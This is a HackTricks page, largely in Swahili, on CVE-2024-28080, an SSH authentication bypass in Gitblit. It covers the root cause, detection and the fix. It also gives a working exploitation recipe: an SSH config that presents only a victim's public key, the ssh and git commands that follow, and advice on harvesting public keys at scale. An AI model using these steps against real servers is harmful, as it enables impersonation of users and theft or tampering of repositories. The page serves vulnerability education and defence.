HackTricks CloudGitblit Embedded SSH Auth Bypass (CVE-2024-28080)
Reading time: 6 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Muhtasari
CVE-2024-28080 ni authentication bypass katika huduma ya embedded SSH ya Gitblit kutokana na kushughulikia state ya session isiyo sahihi wakati wa kuingiliana na Apache MINA SSHD. Ikiwa akaunti ya mtumiaji ina angalau SSH public key iliyosajiliwa, mshambuliaji anayejua username ya mdhuriwa na moja ya public keys za mtumiaji huyo anaweza authenticate bila private key na bila password.
- Imeathiriwa: Gitblit < 1.10.0 (observed on 1.9.3)
- Imerekebishwa: 1.10.0
- Mahitaji ya kuitumia:
- Git over SSH enabled on the instance
- Akaunti ya mwathirika ina angalau SSH public key iliyosajiliwa ndani ya Gitblit
- Mshambuliaji anajua username ya mwathirika na moja ya public keys zao (kwa kawaida inaweza kupatikana, mfano, https://github.com/
.keys)
Sababu ya msingi (state leaks between SSH methods)
Katika RFC 4252, public‑key authentication hufanywa kwa hatua mbili: server kwa kwanza hukagua kama public key iliyotolewa inakubalika kwa username, na tu baada ya challenge/response pamoja na signature ndipo inamthibitisha mtumiaji. Katika MINA SSHD, PublickeyAuthenticator inaitwa mara mbili: kwenye key acceptance (bado hakuna signature) na baadaye baada ya client kurudisha signature.
PublickeyAuthenticator ya Gitblit ilibadilisha session context kwenye mwito wa kwanza, wa kabla ya signature, kwa kubindisha authenticated UserModel kwenye session na kurudisha true ("key acceptable"). Wakati authentication baadaye ilipotanguka hadi password, PasswordAuthenticator iliamini state hiyo iliyobadilishwa ya session na kukataa hatua za uthibitisho, kurudisha true bila kuvalidate password. Matokeo yake, password yoyote (ikiwa ni pamoja na tupu) ilikubaliwa baada ya hapo kuwa na public‑key "acceptance" kwa user huyo.
Mtiririko uliokosea kwa kiwango cha juu:
- Client inatoa username + public key (bado hakuna signature)
- Server inatambua key kuwa ya user na kwa mapema inaweka user kwenye session, ikarudisha true ("acceptable")
- Client hawezi kusign (hakuna private key), hivyo auth inarudi kwa password
- Password auth inaona user tayari yupo kwenye session na bila masharti inarudisha success
Hatua‑kwa‑hatua exploitation
- Kusanya username ya mwathirika na moja ya public keys zao:
- GitHub exposes public keys at https://github.com/
.keys - Public servers mara nyingi huonyesha authorized_keys
- Configure OpenSSH ili ipresent sehemu ya public pekee ili signature generation itashindwa, kulazimisha fallback kwa password huku ikichochea public‑key acceptance path kwenye server.
Mfano wa SSH client config (no private key available):
# ~/.ssh/config
Host gitblit-target
HostName <host-or-ip>
User <victim-username>
PubkeyAuthentication yes
PreferredAuthentications publickey,password
IdentitiesOnly yes
IdentityFile ~/.ssh/victim.pub # public half only (no private key present)
Unganisha na bonyeza Enter kwenye ombi la nenosiri (au andika mfuatano wowote):
ssh gitblit-target
# or Git over SSH
GIT_SSH_COMMAND="ssh -F ~/.ssh/config" git ls-remote ssh://<victim-username>@<host>/<repo.git>
Uthibitishaji unafanikiwa kwa sababu awamu ya awali ya public‑key ilibadilisha kikao kuwa mtumiaji aliyethibitishwa, na password auth inaamini kwa makosa hali hiyo.
Note: If ControlMaster multiplexing is enabled in your SSH config, subsequent Git commands may reuse the authenticated connection, increasing impact.
Athari
- Udanganyifu kamili wa mtumiaji yeyote wa Gitblit ambaye ana angalau SSH public key moja iliyosajiliwa
- Ufikiaji wa kusoma/kuandika kwa repositories kulingana na ruhusa za mwathirika (source exfiltration, unauthorized pushes, supply‑chain risks)
- Inaweza kuathiri usimamizi ikiwa lengo ni mtumiaji admin
- Ni exploit safi ya mtandao; hakuna brute force au private key inahitajika
Mawazo ya utambuzi
- Kagua SSH logs kwa mfululizo ambapo jaribio la publickey linafuatiwa na password authentication iliyofanikiwa kwa password tupu au fupi sana
- Tafuta mtiririko: publickey method inayotoa unsupported/mismatched key material ikifuatiwa na mafanikio ya mara moja ya password kwa username ile ile
Uzuiaji
- Sasisha hadi Gitblit v1.10.0+
- Mpaka kusasisha:
- Zima Git over SSH kwenye Gitblit, au
- Zuia upatikanaji wa mtandao kwa huduma ya SSH, na
- Fuatilia mifumo isiyo ya kawaida iliyoelezwa hapo juu
- Badilisha credentials za watumiaji walioathirika ikiwa kunashukiwa kompromisi
Kwa ujumla: matumizi mabaya ya SSH auth method state‑leakage (MINA/OpenSSH‑based services)
Mfano: Ikiwa public‑key authenticator ya server inabadilisha state ya mtumiaji/kikao wakati wa awamu ya pre‑signature "key acceptable" na authenticators wengine (mf., password) wanaamini hali hiyo, unaweza kupitisha uthibitisho kwa:
- Kuonyesha public key halali ya mtumiaji lengwa (hakuna private key)
- Kulazimisha client kushindwa kusaini ili server irejelee kwenye password
- Kutoa password yoyote huku password authenticator ikifupika kwa leaked state
Vidokezo vya vitendo:
- Public key harvesting at scale: vuta public keys kutoka vyanzo vya kawaida kama https://github.com/
.keys, organizational directories, team pages, leaked authorized_keys - Forcing signature failure (client‑side): elekeza IdentityFile kwa .pub pekee, weka IdentitiesOnly yes, endelea kuwa PreferredAuthentications inajumuisha publickey kisha password
- MINA SSHD integration pitfalls:
- PublickeyAuthenticator.authenticate(...) haipaswi kuambatanisha user/session state hadi post‑signature verification path ithibitishe signature
- PasswordAuthenticator.authenticate(...) haipaswi kubaini mafanikio kutokana na state yoyote iliyobadilishwa wakati wa njia ya uthibitisho iliyopita, isiyokamilika
Related protocol/design notes and literature:
- SSH userauth protocol: RFC 4252 (publickey method is a two‑stage process)
- Historical discussions on early acceptance oracles and auth races, e.g., CVE‑2016‑20012 disputes around OpenSSH behavior
References
- Gitblit CVE-2024-28080: SSH public‑key fallback to password authentication bypass (Silent Signal blog)
- Gitblit v1.10.0 release notes
- Apache MINA SSHD project
- PublickeyAuthenticator API
- RFC 4252: The Secure Shell (SSH) Authentication Protocol
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.